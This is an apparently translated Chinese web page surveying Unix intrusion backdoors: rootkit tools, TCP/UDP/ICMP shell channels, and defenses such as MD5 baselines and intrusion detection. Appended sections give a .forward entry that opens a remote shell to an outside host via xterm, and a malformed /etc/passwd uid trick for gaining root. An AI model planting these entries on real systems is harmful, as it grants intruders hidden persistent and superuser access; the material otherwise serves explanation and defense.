system-backdoor.html

学习linux的工具书

<br>ps: - hides the processes.
<br>Ns - modified netstat to hide connections to certain machines.
<br>Ls - hides certain directories and files from being listed.
<br>du5 - hides how much space is being used on your hard drive.
<br>ls5 -&nbsp; hides certain files and directories from being listed.
<br>&nbsp;
<br>&nbsp;
<p>网络通行后门
<p>入侵者不仅想隐匿在系统里的痕迹, 而且也要隐匿他们的网络通行. 这些网络通行后
<br>门有时允许入侵者通过防火墙进行访问. 有许多网络后门程序允许入侵者建立某个端
<br>口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行,
管理
<br>员可能忽视入侵者的足迹. 这种后门通常使用TCP,UDP和ICMP, 但也可能是其他类型报
<br>文.
<br>&nbsp;
<p>TCP Shell 后门
<p>入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他
<br>们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat
<br>命令查看当前的连接状态, 那些端口在侦听, 目前连接的来龙去脉. 通常这些后门可
<br>以让入侵者躲过TCP Wrapper技术. 这些后门可以放在SMTP端口, 许多防火墙允许
<br>e-mail通行的.
<br>&nbsp;
<br>&nbsp;
<p>UDP Shell 后门
<p>管理员经常注意TCP连接并观察其怪异情况, 而UDP Shell后门没有这样的连接,
所以
<br>netstat不能显示入侵者的访问痕迹. 许多防火墙设置成允许类似DNS的UDP报文的通
<br>行. 通常入侵者将UDP Shell放置在这个端口, 允许穿越防火墙.
<br>&nbsp;
<p>ICMP Shell 后门
<p>Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一. 许多防火墙允许外
<br>界ping它内部的机器. 入侵者可以放数据入Ping的ICMP包, 在ping的机器间形成一个
<br>shell通道. 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不
<br>会暴露.
<br>&nbsp;
<br>&nbsp;
<p>加密连接
<p>管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加密
<br>后,就不可能被判定两台机器间的传输内容了.
<br>&nbsp;
<p>Windows NT
<p>由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说就很
<br>难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广泛的来自
<br>Unix的网络攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地利用
<br>WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows NT上,
管理
<br>员可以等候入侵者的到来. 今天, Windows NT已经有了telnet守护程序. 通过网络通
<br>行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Network Traffic
<br>backdoors, theyarevery feasible for intruders to install on Windows
NT. 此
<br>处该如何翻译? :(
<br>&nbsp;
<br>&nbsp;
<p>解决
<p>当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀.
<br>&nbsp;
<br>&nbsp;
<p>评估
<p>首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之.许多
<br>商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的安全补丁的
<br>话,许多公司将大大提高安全性.
<br>&nbsp;
<p>MD5基准线
<p>一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在黑客入侵前
<br>由干净
<br>系统建立. 一旦黑客入侵并建立了后门再建立基准线, 那么后门也被合并进去了.一些
<br>公司被入侵且系统被安置后门长达几个月.所有的系统备份多包含了后门. 当公司发现
<br>有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因为他们恢复系统的同时也恢复
<br>了后门. 应该在入侵发生前作好基准线的建立.
<br>&nbsp;
<br>&nbsp;
<p>入侵检测
<p>随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要.以前
<br>多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于实时侦听和
<br>网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判断是否符合DNS协
<br>议请求. 如果数据不符合协议, 就发出警告信号并抓取数据进行进一步分析.
同样的
<br>原则可以运用到ICMP包, 检查数据是否符合协议要求, 或者是否装载加密shell会话.
<br>&nbsp;
<br>&nbsp;
<p>从CD-ROM启动
<p>一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法
<br>的问题是实现的费用和时间够企业面临的.
<br>&nbsp;
<br>&nbsp;
<p>警告
<p>由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击和安
<br>置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不懈的努力!
<br>( Be aware that no defense is foolproof, and that there is no substitute
<br>for
<br>diligent attention. 此句该如何翻译? :( )
<p>-------------------------------------------------------------------------
<br>&nbsp;
<p>you may want to add:
<p>&nbsp;&nbsp;&nbsp; .forward Backdoor
<p>&nbsp;&nbsp;&nbsp; On Unix machines, placing commands into the .forward
file was also
<br>&nbsp;&nbsp;&nbsp; a common method of regaining access.&nbsp; For the
account ``username''
<br>&nbsp;&nbsp;&nbsp; a .forward file might be constructed as follows:
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \username
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; |"/usr/local/X11/bin/xterm
-disp hacksys.other.dom:0.0 -e
<br>/bin/sh"
<p>&nbsp;&nbsp;&nbsp; permutations of this method include alteration of
the systems mail
<br>&nbsp;&nbsp;&nbsp; aliases file (most commonly located at /etc/aliases).&nbsp;
Note that
<br>&nbsp;&nbsp;&nbsp; this is a simple permutation, the more advanced&nbsp;
can run a simple
<br>&nbsp;&nbsp;&nbsp; script from the forward file that can take arbitrary
commands via
<br>&nbsp;&nbsp;&nbsp; stdin (after minor preprocessing).
<p>PS: The above method is also useful gaining access a companies
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mailhub (assuming there
is a shared a home directory FS on
<br>&nbsp; &amp;nbs>
<br>&nbsp;
<p>the client and server).
<p>> Using smrsh can effectively negate this backdoor (although it's quite
<br>> possibly still a problem if you allow things like elm's filter or
<br>> procmail which can run programs themselves...).
<br>&nbsp;
<br>&nbsp;
<p>你也许要增加:
<p>&nbsp;&nbsp; .forward后门
<p>&nbsp; Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户'username'
<br>的
<br>.forward可能设置如下:
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \username
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; |"/usr/local/X11/bin/xterm
-disp hacksys.other.dom:0.0 -e
<br>/bin/sh"
<br>&nbsp;
<p>这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只
<br>是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行
<br>任意命令(小部分预处理后).
<br>>利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或
<br>procmail>类程序, 很有可能还有问题 ......)
<p>( 此段的内容理解不深, 故付上英文, 请指教! )
<p>---------------------------------------------------------------------------
<br>&nbsp;
<p>你也许能用这个"特性"做后门:
<p>当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能检查
<br>出这个错误
<br>的uid/gid, 而atoi(3)将设uid/gid为0, 便给了超级用户的权利.
<p>例子:
<p>rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
<br>在Linux里,这将把用户rmartin的uid设为0.
<br>&nbsp;
<br>&nbsp;
<br>本文所有权归作者所有！如要转载请保持文章完整性
<br>绿色兵团 http://i.am/hack1/
<br>&nbsp;